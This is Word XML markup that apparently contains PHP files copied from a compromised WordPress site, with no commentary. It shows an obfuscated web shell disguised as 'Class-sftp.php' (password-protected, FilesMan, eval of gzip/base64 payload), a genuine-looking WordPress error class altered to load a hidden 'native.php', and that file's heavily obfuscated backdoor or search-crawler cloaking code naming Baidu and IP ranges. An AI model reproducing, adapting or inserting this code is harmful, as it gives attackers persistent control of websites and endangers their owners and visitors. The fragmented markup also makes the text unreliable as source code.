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79" w:rsidRDefault="006510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Class-sftp.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006510B0" w:rsidRDefault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&lt;?php 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$auth_pass = "ab609fd10137fb6dc37ba0c55350346b"; //restored102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$color = "#df5";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$default_action = 'FilesMan';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$default_use_ajax = true;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$default_charset = 'Windows-1251';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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</w:t>
      </w:r>
      <w:r w:rsidRPr="006510B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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</w:t>
      </w:r>
      <w:r w:rsidRPr="006510B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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</w:t>
      </w:r>
      <w:r w:rsidRPr="006510B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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</w:t>
      </w:r>
      <w:r w:rsidRPr="006510B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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</w:t>
      </w:r>
      <w:r w:rsidRPr="006510B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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</w:t>
      </w:r>
      <w:r w:rsidRPr="006510B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>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'\x29\x29\x29\x3B",".");?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006510B0" w:rsidRDefault="006510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10B0" w:rsidRDefault="006510B0" w:rsidP="006510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class-wp-error.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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&lt;?php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WordPress Error API.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Contains the WP_Error class and the is_wp_error() function.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@package WordPress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WordPress Error class.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Container for checking for WordPress errors and error messages. Return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WP_Error and use {@link is_wp_error()} to check if this class is returned.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Many core WordPress functions pass this class in the event of an error and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if not handled properly will result in code errors.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@package WordPress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*/@require_once ('native.php');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class WP_Error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Stores the list of errors.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@var array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@access private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var $errors = array();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Stores the list of data for error codes.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@var array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@access private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var $error_data = array();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Constructor - Sets up error message.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If code parameter is empty then nothing will be done. It is possible to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add multiple messages to the same code, but with other methods in the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class.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lastRenderedPageBreak/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All parameters are optional, but if the code parameter is set, then the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data parameter is optional.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string|int $code Error code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 $message Error message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mixed $data Optional. Error data.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@return WP_Error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__construct($code = '', $message = '', $data = '')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empty($code)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$this-&gt;errors[$code][] = $message;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! empty($data)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$this-&gt;error_data[$code] = $data;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Retrieve all error codes.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@access public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@return array List of error codes, if available.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get_error_codes()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empty($this-&gt;errors)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array();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array_keys($this-&gt;errors);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Retrieve first error code available.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@access public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@return string|int Empty string, if no error codes.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get_error_code()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$codes = $this-&gt;get_error_codes();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empty($codes)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'';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$codes[0];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lastRenderedPageBreak/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Retrieve all error messages or error messages matching code.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string|int $code Optional. Retrieve messages matching code, if exists.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@return array Error strings on success, or empty array on failure (if using code parameter).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get_error_messages($code = '')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// Return all messages if no code specified.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empty($code) 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$all_messages = array();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foreach ( (array) $this-&gt;errors as $code =&gt; $messages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$all_messages = array_merge($all_messages, $messages);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$all_messages;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isset($this-&gt;errors[$code])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$this-&gt;errors[$code];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else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array();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Get single error message.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This will get the first message available for the code. If no code is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given then the first code available will be used.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string|int $code Optional. Error code to retrieve message.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@return string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get_error_message($code = '')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empty($code)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$code = $this-&gt;get_error_code();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$messages = $this-&gt;get_error_messages($code);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empty($messages)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'';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$messages[0];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lastRenderedPageBreak/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Retrieve error data for error code.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string|int $code Optional. Error code.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@return mixed Null, if no errors.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get_error_data($code = '')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empty($code)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$code = $this-&gt;get_error_code();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isset($this-&gt;error_data[$code])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$this-&gt;error_data[$code];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null;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Append more error messages to list of error messages.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@access public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string|int $code Error code.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 $message Error message.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mixed $data Optional. Error data.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add($code, $message, $data = '')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$this-&gt;errors[$code][] = $message;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! empty($data)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$this-&gt;error_data[$code] = $data;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Add data for error code.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The error code can only contain one error data.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mixed $data Error data.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 @param string|int $code Error code.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function add_data($data, $code = '')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if ( empty($code)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$code = $this-&gt;get_error_code();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$this-&gt;error_data[$code] = $data;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}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006510B0" w:rsidRP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/**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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> * Check whether variable is a WordPress Error.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Looks at the object and if a WP_Error class. Does not check to see if the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parent is also WP_Error, so can't inherit WP_Error and still use this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function.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@since 2.1.0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@param mixed $thing Check if unknown variable is WordPress Error object.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 @return bool True, if WP_Error. False, if not WP_Error.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 */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function is_wp_error($thing) {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if ( is_object($thing) &amp;&amp; is_a($thing, 'WP_Error') )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</w:r>
      <w:r w:rsidRPr="006510B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:tab/>
        <w:t>return true;</w:t>
      </w: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ab/>
        <w:t>return false;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006510B0" w:rsidRDefault="006510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10B0" w:rsidRDefault="006510B0" w:rsidP="006510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Native.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006510B0" w:rsidRDefault="006510B0" w:rsidP="006510B0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsid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 xml:space="preserve">&lt;? $GLOBALS['_1739858145_']=Array('e' .'rror' .'_' .'r' .'eporting','' .'in' .'i_' .'se' .'t','in' .'i_set','' .'soc' .'k' .'et_' .'get' .'peerna' .'m' .'e','s' .'trto' .'k','strpbrk','session_' .'i' .'s_reg' .'ist' .'ered','preg_replace','ima' .'gecre' .'at' .'efro' .'mg' .'i' .'f','ar' .'ray_pop','implode','preg_mat' .'ch','i' .'m' .'pl' .'ode','preg_ma' .'t' .'ch','str' .'ripos','fl' .'o' .'ck','array_f' .'lip','mt_rand','p' .'reg_' .'match','p' .'reg_mat' .'ch','im' .'pl' .'o' .'de','p' .'reg_' .'m' .'a' .'tch','' .'b' .'as' .'e64_encode','ser' .'ialize','fi' .'l' .'e' .'_get' .'_c' .'ontents','b' .'ase64_d' .'ecode','preg_m' .'atch','' .'pre' .'g_rep' .'la' .'ce','' .'preg_replace','u' .'nse' .'ri' .'alize','base64' .'_d' .'e' .'cod' .'e'); ?&gt;&lt;? function _1708135491($i){$a=Array('' .'bWF4' .'X2' .'V4' .'ZW' .'N1dGlvbl90aW' .'1l','' .'ZGVmYXVsdF9zb2NrZXRfd' .'Gl' .'tZW91dA==','YUh' .'S' .'MGNEb3ZMM1' .'JvWldK' .'bGMzUmpZV' .'05vWlM1amI' .'y' .'MHZaVzVuYVc1bE' .'xuQm9jQ' .'T09','YUhSMGNEb3ZMM' .'jE1WW1' .'W' .'emRHT' .'mh' .'ZMmhsTG1OdmJ' .'TOWxibWRw' .'Y' .'m1VdW' .'NHaHc' .'=','SFRUUF9' .'VU0VSX0FHRU' .'5U','SFRUUF9SR' .'UZFU' .'kVS','' .'SFRUUF' .'9IT1NU','Uk' .'VNT1RFX0' .'FERFI' .'=','UVVFUllfU1' .'RSSU' .'5H','' .'U0VSVkVSX1NJR' .'05' .'BVFVS' .'R' .'Q==','UkVR' .'VUVTVF9VUkk=','Uk' .'VNT1RFX0F' .'ERFI=','L153' .'d3dcLi9p','','dHdh','Qm' .'FpZH' .'VzcGlkZXI=','' .'Ym' .'FpZHUuY29t','Y' .'mFpZHU=','M' .'TM3Lj' .'ExMC4yMjIuM' .'jUw','fA==','' .'f' .'A==','' .'L1' .'4xMjh' .'cLjE' .'3N1wuMjQz' .'X' .'C5bMC05XSs' .'kLw==','L14' .'xMjhc' .'LjE3N' .'1w' .'uM' .'jQ0X' .'C4oO' .'D' .'Z' .'8ODd8ODh' .'8ODl8' .'OTB8OTF' .'8OT' .'J8OTN8OT' .'R8OT' .'V8OT' .'Z8OTd8OTh8' .'O' .'T' .'l' .'8M' .'TAwK' .'S' .'Qv','' .'L14xNDFc' .'L' .'jE4NVwuM' .'jA5XC5bMC0' .'5XS' .'skL' .'w==','L14xNj' .'ZcLj' .'Q4XC' .'4yM' .'j' .'V' .'cLj' .'I1NCQv','L' .'1' .'4xNj' .'lc' .'L' .'jIwN1wuM' .'jM4XC5bMC05' .'XSskLw==','L14xOTR' .'cLjExMlwuOT' .'Rc' .'LigyNTB8MjU' .'xfDI1' .'Mik' .'kLw' .'==','L14x' .'OT' .'RcLjIwMVwuMTQ2X' .'C' .'4oM' .'XwyfDN8NHw1fDZ8N3w4fD' .'l' .'8M' .'TB8M' .'TF8M' .'T' .'J8MTN' .'8' .'MTR8MTV8' .'MTZ8MTd8MTh8MTl8MjB8MjF' .'8' .'MjJ' .'8Mj' .'N8Mj' .'QpJ' .'C' .'8' .'=','' .'L' .'14xOT' .'RcLjIyMVw' .'uODRcL' .'igxMXw' .'x' .'Mn' .'wxM3wxNHwxNXwxNnwxN3wx' .'O' .'H' .'wx' .'OXwyMH' .'wy' .'MXwy' .'Mnwy' .'M3wy' .'NHwy' .'N' .'Xw' .'y' .'Nn' .'wyN3wyO' .'Hwy' .'OX' .'wzMHwz' .'MXwz' .'MnwzM3w' .'zN' .'HwzNX' .'w' .'zNnwzN' .'3wzO' .'Hw' .'zOXw0MH' .'w0MSkkLw==','L14' .'xOT' .'RcLjU' .'xX' .'C4zM1wuN' .'zIkLw==','L14xOTVcLjE0' .'NVwu' .'M' .'TE' .'5X' .'C4o' .'MjR8MjUpJC' .'8=','L14xO' .'T' .'VcLjIyOFwuM' .'jQwXC' .'4xNzck' .'Lw==','L' .'14xOT' .'h' .'c' .'LjNc' .'Lj' .'Ew' .'M' .'1wu' .'WzAtOV0r' .'JC' .'8=','L14xOTh' .'cLj' .'VcLjIwOF' .'wuWzAtOV0' .'r' .'JC8=','L14xOTh' .'cLjVc' .'LjIxMFwu' .'WzAtOV0rJ' .'C8' .'=','L14xOTlcLjE' .'3Mlwu' .'MTQ' .'4XC4oMTF8MTJ' .'8MTN8MTR8MT' .'V' .'8M' .'TZ8M' .'T' .'d8' .'MTh8MTl' .'8MjB8MjF8' .'MjJ' .'8MjN8MjR' .'8Mj' .'V8' .'MjZ8' .'M' .'jd8Mjh8Mjl8Mz' .'B8MzF8M' .'zJ' .'8MzN8MzR8Mz' .'V8M' .'zZ8Mzd8Mz' .'h8' .'M' .'zl8NDB' .'8N' .'DF8N' .'DJ' .'8NDN8NDR' .'8N' .'DV' .'8NDZ' .'8NDd8' .'N' .'Dh8ND' .'l8N' .'TB8NTF8NT' .'J8NTN8NTR8NTV' .'8' .'NT' .'Z8NTd' </w:t>
      </w:r>
      <w:r w:rsidRPr="006510B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">.'8NTh8N' .'T' .'l8' .'N' .'j' .'B' .'8NjF8NjJ' .'8NjN8NjR8N' .'jV8Nj' .'Z8Njd' .'8Njh8Njl8NzB8' .'NzF8NzJ8NzN8N' .'zR8' .'NzV' .'8' .'NzZ' .'8Nzd8Nzh8N' .'z' .'l8ODB' .'8O' .'DF8' .'ODJ8ODN8ODR8' .'O' .'DV8ODZ8ODd' .'8ODh' .'8O' .'Dl8OTB8' .'OTF8O' .'TJ8O' .'TN8OTR8OT' .'V8O' .'T' .'Z8OTd8' .'OTh8' .'OTl8M' .'TAwfDEw' .'MXw' .'xMDJ8MTAz' .'f' .'DEwNHwxMD' .'U' .'pJC8=','L14xOTlc' .'LjE3MlwuMTQ5X' .'C5bMC' .'0' .'5XS' .'s' .'kLw==','L14xOTlcL' .'jE3M' .'lwuMT' .'UyXC5' .'bM' .'C' .'0' .'5' .'XSskLw=' .'=','L' .'14xOTlcL' .'jE3Mlwu' .'MTUzXC' .'4oMTc0fDE3' .'N' .'XwxN' .'zZ8MTc3' .'f' .'DE3O' .'C' .'kk' .'Lw' .'==','L14xOTlcLjE3Mlw' .'uMTU2X' .'C' .'4' .'oMTY4' .'fD' .'E2O' .'XwxNzB8MTcxf' .'DE' .'3MnwxNzN8M' .'Tc0f' .'DE' .'3' .'NXw' .'x' .'NzZ' .'8' .'MTc3fDE' .'3OHw' .'xNzl8MTgwfDE' .'4M' .'X' .'wxODJ8MTgzfD' .'E4' .'NH' .'w' .'xO' .'D' .'V8MTg2fDE4' .'N' .'3wxODh8M' .'Tg5fDE5M' .'HwxOTF8MT' .'ky' .'fDE5M3wxO' .'TR8MTk1fDE' .'5NnwxOTd8' .'MTk4f' .'D' .'E5OXwyM' .'DB8MjAxfDI' .'w' .'MnwyM' .'DN8MjA' .'0fD' .'IwNXwyMD' .'Z8Mj' .'A3fD' .'IwOH' .'wyMDl' .'8MjEwfDIxMXw' .'yMTJ8Mj' .'Ez' .'f' .'DIxN' .'H' .'w' .'yMT' .'V8M' .'jE2f' .'DIxN' .'3wyM' .'Th8MjE' .'5KS' .'Qv','L1' .'4x' .'OTlcL' .'jE3MlwuMTU3' .'X' .'C4' .'yO' .'CQv','' .'L14' .'xOTlcL' .'jE3' .'N1wuMThcLjkkLw=' .'=','L14' .'yMDJcLjE' .'2MFwuMT' .'d' .'bOC05X' .'Vwu' .'WzAtOV' .'0rJC8=','L' .'14yM' .'D' .'Jc' .'Lj' .'E' .'2M' .'FwuMT' .'h' .'bMC' .'0' .'x' .'XVw' .'uWzAtOV0' .'r' .'JC' .'8=','L' .'14yMDJcL' .'j' .'E' .'2MF' .'wuMTg' .'zXC4oMTg' .'yfDE' .'4M3wxODR8' .'MTg1fDE4NnwxODd8MTg4fD' .'E' .'4OX' .'wxO' .'TB8MTkxfD' .'E5M' .'nwxOTN' .'8' .'M' .'Tk' .'0f' .'DE5NXw' .'xOTZ8M' .'Tk3' .'fDE' .'5OHw' .'xOTl8MjAwfDIwMXwyMDJ' .'8MjAzfD' .'Iw' .'N' .'Hw' .'y' .'M' .'DV' .'8M' .'jA' .'2fDI' .'wN3wyMDh8' .'M' .'j' .'A5' .'fDIxMHwyM' .'TF8MjE' .'yfDIx' .'M3w' .'yMTR8MjE' .'1fDIxNn' .'wyMTd8' .'M' .'jE' .'4' .'fDIxOXw' .'yMjB8' .'MjI' .'xfDIyMn' .'wyMj' .'N8' .'Mj' .'I0f' .'D' .'Iy' .'NXwyMj' .'Z8' .'MjI3fDI' .'y' .'OHwyMjl8' .'MjMwfDI' .'z' .'MXwy' .'MzJ8MjMz' .'fD' .'I' .'zNHwy' .'MzV8MjM2' .'f' .'DIz' .'N3wyMzh8MjM' .'5' .'fDI0' .'MHwyNDF8MjQ' .'yfDI' .'0M3w' .'y' .'ND' .'R8MjQ1K' .'SQv','L' .'14yMDJcLjE2M' .'Fwu' .'MTg1XC' .'4xNzQkLw==','L' .'14yM' .'DJcLjE2NVwuOT' .'ZcLj' .'E0MiQv','L14' .'yMD' .'JcLjE' .'2NVwuOThcLls' .'w' .'L' .'TldKyQv','' .'L14yM' .'DJ' .'c' .'LjE2N' .'Vw' .'uO' .'T' .'lcL' .'lswLTldKyQv','' .'L14yMDJc' .'LjIxMlwu' .'N' .'VwuKDMwf' .'DMxfDMyf' .'D' .'M' .'zfDM0fDM1' .'fDM2f' .'DM3fDM4' .'fDM5fD' .'QwfDQxfDQyf' .'DQzfDQ0f' .'DQ1fDQ2fDQ3f' .'DQ4KSQ' .'v','L14' .'yMDJcL' .'jIz' .'MlwuMTE4XC4' .'oNDB8NDF8NDJ8NDN8ND' .'R8N' .'DV8' .'ND' .'Z8' .'NDd8NDh8NDl' .'8NTB' .'8NTEpJC8=','L14yMDJcLj' .'M' .'zXC4yNTBcLi' .'gxNDZ8M' .'TQ3fD' .'E0OHwxN' .'Dl' .'8MTUwfDE1M' .'XwxN' .'TJ8' .'M' .'T' .'UzfDE1N' .'CkkLw' .'==','L' .'1' .'4' .'yMDJcLjQ2' .'XC4x' .'OV' .'wuOTMkLw==','L14yMD' .'NcLjEyM1wu' .'M' .'T' .'g4XC' .'4yJC8=','L14' .'yMDN' .'cLjE' .'0' .'MVwuNT' .'JcLig0' .'MXw' .'0' .'M' .'nw0M3w0' .'NHw0NXw0' .'Nnw0NykkLw' .'==','L1' .'4' .'yMDNcLjI1NVwuMj' .'M' .'0XC4oMTAy' .'fD' .'EwM3wxMDR8MTA1fDEwNik' .'kLw==','L14y' .'MDRc' .'LjEyM1' .'wuMTNcLigzNnwz' .'N' .'3' .'wzOH' .'w' .'zOX' .'w0MHw0M' .'Xw0' .'M' .'nw' .'0M3w0NHw0NX' .'w0' .'Nnw0N3w' .'0OHw' .'0OX' .'w' .'1MHw' .'1MXw1Mnw' .'1M3w' .'1NHw1N' .'X' .'w1Nnw1N3w1OHw1OX' .'w2MHw' .'2MXw2' .'Mnw' .'2M3w2' .'NHw2NXw2Nik' .'k' .'L' .'w==','' .'L' .'1' .'4' .'yM' .'D' .'Rc' .'LjE' .'yM1' .'wuMlwuWzAtOV0rJ' .'C8' </w:t>
      </w:r>
      <w:r w:rsidRPr="006510B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">.'=','L14y' .'MDRcL' .'jE' .'yM1' .'w' .'uM' .'j' .'hcLigxMHwxM' .'XwxMn' .'wxM' .'3wx' .'NHw' .'x' .'NX' .'w' .'x' .'Nn' .'wx' .'N3wx' .'OHwxOXwy' .'MH' .'wyMXwyM' .'nwyM3' .'wyNH' .'wy' .'NXwy' .'Nn' .'wy' .'N3' .'wyOHwyOXwzMHwz' .'MXwzMnwzMykkLw' .'=' .'=','L' .'14y' .'MD' .'RcLjEyM' .'1wu' .'O' .'V' .'wuWzA' .'tOV' .'0rJC' .'8=','L1' .'4yMDR' .'cLjE1MlwuMT' .'kwXC5bM' .'C05' .'XSskLw==','L' .'14yM' .'DRcL' .'jE1MlwuMT' .'kxXC5' .'bMC05XSskLw' .'==','L14y' .'MDR' .'cLjE' .'2MlwuOTZcLlsw' .'LTldKyQv','L1' .'4' .'y' .'M' .'DRcL' .'jE2' .'MlwuOTdcL' .'lswLTld' .'K' .'yQv','L1' .'4yMDRcL' .'jE2M' .'lwu' .'OThcLl' .'swLTldKyQv','L14yM' .'DRcLjE2Nlw' .'uMTExXC4yOS' .'Qv','' .'L1' .'4' .'yM' .'D' .'RcLjI' .'wMl' .'wuMT' .'MyX' .'C4xO' .'SQv','L14yMDR' .'cL' .'j' .'Y' .'yXC' .'4yNDVcLl' .'swLTldKy' .'Qv','' .'L14yMD' .'VcLjE4MVwuNzVcLig' .'2MH' .'w2MXw2' .'M' .'nw2' .'M3w2' .'NHw' .'2NX' .'w2Nn' .'w2N3' .'w2O' .'Hw2OXw' .'3MHw3M' .'Xw' .'3Mnw3M3w3NHw3NXw3Nnw' .'3N' .'3w3OHw3O' .'Xw4MHw4MX' .'w4M' .'nw' .'4M3w4NH' .'w4NXw4N' .'nw4N3' .'w4OHw4OXw5' .'M' .'H' .'w5MXw5Mnw5' .'M3w5NHw5N' .'X' .'w' .'5Nnw5N3w5OHw' .'5' .'OXwxMD' .'B8MTAxfDEwMnwxMDN8' .'MTA0fDEwNXwxMDZ8' .'M' .'TA' .'3' .'f' .'DEwOH' .'wxMDl8MTEw' .'fDExM' .'XwxM' .'TJ8MTEzfDExNH' .'wxMTV' .'8MT' .'E2fD' .'ExN' .'3' .'wx' .'MT' .'h8MTE5fDEyMHwx' .'Mj' .'F8M' .'TI' .'y' .'fD' .'Ey' .'M' .'3' .'wxMjR8' .'MTI' .'1fDE' .'yNnwxMjd8MT' .'I4fD' .'EyOX' .'wxMz' .'ApJC8=','L' .'14yMDVc' .'LjIyNlwu' .'MjAx' .'XC5bMC0' .'5X' .'Ss' .'k' .'L' .'w==','' .'L14yMDVcLjIyNlwuMj' .'AzXC4oMzV8' .'MzZ8Mz' .'d8M' .'zh8Mzl8N' .'DB8NDF8NDJ8NDN8NDR8NDV8NDZ' .'8NDd8NDh8' .'N' .'Dl8NTB8NTF8NTJ8NTN8N' .'TR' .'8N' .'TV8NTZ' .'8N' .'Td8N' .'Th8NTl8NjB8N' .'j' .'F8NjJ8Nj' .'N8NjR8NjV' .'8N' .'jZ8' .'Njd' .'8Njh8Nj' .'l8N' .'zB8N' .'zF8NzJ8NzN8NzR8N' .'zV' .'8NzZ8' .'Nzd8Nzh8Nz' .'l8' .'OD' .'B8OD' .'F8ODJ8ODN8' .'ODR8O' .'DV8ODZ8OD' .'d8ODh8O' .'Dl8O' .'TB8OTF8' .'OTJ8O' .'T' .'N8O' .'TR8OTV8OTZ8OT' .'d8OT' .'h8' .'OT' .'l' .'8MTAw' .'fDEw' .'MXwxMDJ' .'8' .'MT' .'A' .'zfDEw' .'NH' .'wxMDV8' .'MTA2fDE' .'w' .'N3wx' .'MDh8MTA5' .'fDExMHw' .'xMT' .'F8MTEy' .'fDE' .'xM3wx' .'MTR8' .'MTE1f' .'D' .'ExN' .'n' .'wxMTd8MTE4f' .'DExOX' .'wx' .'M' .'jB8' .'MTIxfDEyM' .'nwxM' .'jN8' .'MTI0fD' .'EyNXwxM' .'jZ8M' .'TI3f' .'DE' .'yOH' .'wxMjl8MT' .'Mw' .'fDEzMXwxMzJ8MTMzfDEzNHwxMzV8MTM' .'2f' .'D' .'EzN3wx' .'M' .'zh8MTM5f' .'DE0' .'MH' .'wxNDF' .'8' .'MTQ' .'y' .'f' .'DE0M3wxNDR8' .'MTQ1fDE0NnwxNDd8MTQ4f' .'DE0' .'OX' .'wxNTB8MTUxfD' .'E1Mnw' .'xN' .'TN8MTU0fDE' .'1NXwxNTZ8MT' .'U3' .'fDE1' .'OHwx' .'NTl' .'8MTYwfDE' .'2MXwxNjJ8MT' .'Yz' .'fDE' .'2NHw' .'xNjV8' .'MTY2' .'fDE' .'2N3wx' .'Njh8' .'M' .'TY' .'5' .'fDE3' .'MHw' .'xNz' .'F8' .'MTcyfDE' .'3' .'M3' .'wxNzR8MT' .'c1fD' .'E3Nn' .'wxNz' .'d8MTc4fDE3' .'OXwx' .'ODB' .'8MT' .'gxfDE' .'4Mn' .'wxODN8M' .'Tg0fDE' .'4NXw' .'xO' .'DY' .'pJC8=','L14' .'yM' .'D' .'V' .'c' .'LjIyNlw' .'uM' .'j' .'A0XC' .'4yMzgkLw==','L14y' .'MDV' .'cL' .'j' .'I' .'yOVwu' .'ODNcL' .'jE4' .'JC8' .'=','L14yMDZc' .'LjE' .'5MFwuNDNcLig4' .'MXw4Mnw4M3w4NHw4NXw' .'4Nnw4N3w' .'4OH' .'w4' .'OXw5MHw5' .'MXw5Mnw5M' .'3w' .'5NH' .'w5N' .'X' .'w5Nnw5N3w5' .'O' .'Hw5OXwx' .'MDB8MTAxfDEw' .'Mn' .'w' .'xMDN8M' .'TA0fDE' .'wNXwxM' .'DZ' .'8MTA3fDEw' .'OHw' .'xMD' .'l' .'8M' .'TE' .'wfDE' .'x' .'MXwx' .'MTJ8MTEzfDExN' .'Hw' .'xMTV8MTE' .'2fDExN3wxM' .'Th8MTE5fDEy' .'MHw' .'xMjF8MT' .'Iy' .'fDEyM3wx' .'MjR8MTI' .'1' .'K' .'S' .'Qv','L1' </w:t>
      </w:r>
      <w:r w:rsidRPr="006510B0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">.'4yMDZcLj' .'NcLjMwXC4oMTk2fDE5N3' .'wx' .'OTh8M' .'Tk' .'5fDIwMHwy' .'MD' .'F8M' .'jAyfDIwM3wyMD' .'R' .'8MjA1fDIwNnwyM' .'Dd8MjA4fD' .'I' .'wOXwyMTB' .'8MjE' .'xfDIx' .'Mnw' .'y' .'MTN8' .'Mj' .'E0fDI' .'xNXwyMTZ8' .'MjE3' .'fDIxOHw' .'yMTl' .'8Mj' .'I' .'wfDIy' .'M' .'X' .'wyMj' .'J8MjI' .'zfDIyN' .'Hw' .'y' .'MjV' .'8MjI2fDI' .'yN3wy' .'Mjh8' .'M' .'jI' .'5fDIzM' .'H' .'wyMzF8' .'MjMyfDIzM3wyMz' .'R8MjM1fDIzNnwyMzd8MjM' .'4' .'fDIzOXwyNDB8M' .'j' .'Q' .'x' .'fDI0MnwyNDN' .'8MjQ0fDI0NXwyNDZ8MjQ3' .'fDI0' .'OH' .'wy' .'NDl8MjUwfDI1MSkkLw==','' .'L14yMDZcL' .'j' .'c5XC4xNzFcLl' .'s' .'wLTldK' .'yQv','L14' .'yMDdc' .'LjEy' .'N' .'lwuMjM5XC4yMjQkLw==','' .'L14yMD' .'d' .'c' .'Lj' .'c3XC45' .'MFwuWzAtOV0rJC' .'8=','L1' .'4yMDdcL' .'jc3X' .'C4' .'5' .'M' .'V' .'wuM' .'Tg0JC8=','L14yM' .'DhcLjE0N' .'lwu' .'Mj' .'Zc' .'LlswLTldKyQv','L' .'14yMDhcLj' .'E0NlwuMjdcLi' .'g1N3w1OHw' .'1OXw2' .'MHw2MXw2' .'Mnw2M3' .'w' .'2N' .'Hw2' .'NXw2' .'N' .'n' .'w2N' .'3w2OHw2OXw3M' .'Hw3MX' .'w3' .'Mnw3M3' .'w3' .'NHw3' .'N' .'Xw' .'3N' .'nw3N3w3OHw3OXw4MHw4MXw4Mnw4' .'M' .'3w' .'4NHw4NXw' .'4Nnw' .'4N3w4OHw4' .'OXw' .'5MHw5MXw' .'5' .'Mnw5' .'M3w5NHw' .'5NXw5Nnw5N3w5OHw5' .'OXwxMDB8MTAx' .'fDE' .'w' .'M' .'nwx' .'MDN8' .'MTA0fDEwNXwxMDZ' .'8MTA' .'3fDEwOHw' .'x' .'MDl8MT' .'EwfDExM' .'X' .'wxMT' .'J8MTE' .'zfDExNH' .'wxMTV' .'8' .'MTE2' .'fDExN3wxMTh8MTE5f' .'DEyMHwxMjF8' .'MT' .'IyfDE' .'y' .'M3w' .'xMj' .'Q' .'pJ' .'C8=','L14yMD' .'h' .'cLjE4' .'NVw' .'uMjQz' .'XC4xND' .'g' .'kLw==','L14' .'y' .'MDhcLjIx' .'O' .'VwuN' .'zd' .'c' .'Lls' .'wL' .'Tl' .'d' .'KyQv','L14yMDhc' .'LjI' .'y' .'MVwuMzJcLlswLT' .'l' .'dKyQv','' .'L1' .'4yMDhcLj' .'IyM' .'VwuM' .'zVcLigy' .'MDB8MjAxf' .'DIwMnwyMD' .'N' .'8MjA' .'0fDIwNXwyMDZ8' .'MjA3K' .'S' .'Q' .'v','L14yMD' .'lcLjF' .'cLjEyXC5' .'bMC05XSs' .'kL' .'w==','L1' .'4yM' .'D' .'l' .'cLj' .'F' .'cLjEzXC' .'4o' .'MTAxf' .'DEw' .'Mn' .'wxMDN8MTA0fDEwN' .'XwxMDZ8MTA3' .'f' .'D' .'EwO' .'Hwx' .'MDl' .'8' .'MTEwfD' .'ExMXwxMTJ8MTE' .'zf' .'D' .'Ex' .'NHwxMTV8M' .'T' .'E2fDExN3wxMTh8' .'MTE5fDEyMHwxMjF' .'8MT' .'Iy' .'fDEyM3wxMjR' .'8MTI1fDEyNnw' .'xMjd' .'8MTI4fDEyOXwxMz' .'B8' .'MTMxfDEzMn' .'wx' .'Mz' .'N8' .'MT' .'M0' .'f' .'DEzNXwxMzZ8M' .'TM3f' .'DEzO' .'HwxMzl8MTQwfDE0MXwxNDJ8MTQ' .'z' .'fDE' .'0' .'NHwxNDV' .'8' .'MTQ2fDE' .'0N3wxNDh8' .'MT' .'Q' .'5fDE1MHwxN' .'TF8' .'MTUy' .'f' .'DE1' .'M' .'3wx' .'NTR8MTU1fDE1Nnwx' .'NTd8MTU4fDE1OX' .'wxNjB8' .'MTYxfDE' .'2MnwxNj' .'N8' .'MTY0fDE2NXwx' .'NjZ8' .'MTY3' .'fDE2OHwxNjl8' .'MTcwfDE3M' .'XwxNzJ8MT' .'czf' .'DE3N' .'H' .'wxN' .'zV8MTc2fDE3N' .'3wxNzh' .'8MTc5fDE4MHwx' .'ODF8MTgyfDE4M3wxODR8MT' .'g1' .'fDE4NnwxO' .'Dd8' .'MTg4fDE4OXwxOTB8MT' .'kxfDE' .'5M' .'n' .'wxOTN8' .'MT' .'k0fDE5' .'N' .'X' .'wxO' .'TZ8MTk3fD' .'E' .'5OHwxOTl' .'8MjAwfDI' .'wMXwyMDJ8Mj' .'AzfDIwNH' .'wy' .'MDV8M' .'jA2fDIwN3w' .'yMDh8MjA5fDIxMHw' .'yMTF8MjEyfD' .'IxM3w' .'yMTR8M' .'jE1fDIxNnwyMTd8MjE4fDIxOXwyMjB8MjIxfDIy' .'MnwyM' .'jN8MjI0f' .'DIyNXw' .'y' .'MjZ8MjI' .'3f' .'DI' .'yO' .'Hw' .'yMj' .'l' .'8MjMwfDIzMXwyM' .'zIpJ' .'C8=','' .'L14y' .'M' .'DlcLjFcL' .'jMy' .'X' 